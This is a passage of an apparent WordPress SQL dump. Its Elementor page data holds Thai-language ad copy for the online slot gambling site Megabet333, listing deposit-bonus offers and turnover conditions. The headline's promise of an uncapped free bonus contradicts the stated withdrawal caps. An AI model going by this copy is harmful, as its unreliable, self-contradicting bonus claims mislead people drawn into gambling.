\\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(420,75,'_elementor_edit_mode','builder'),(421,75,'_elementor_template_type','wp-page'),(422,75,'_elementor_version','3.32.5'),(423,75,'_elementor_pro_version','3.32.3'),(424,75,'_wp_page_template','default'),(425,75,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(426,75,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19:<\\/strong> 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(431,76,'_elementor_edit_mode','builder'),(432,76,'_elementor_template_type','wp-page'),(433,76,'_elementor_version','3.32.5'),(434,76,'_elementor_pro_version','3.32.3'),(435,76,'_wp_page_template','default'),(436,76,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(437,76,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 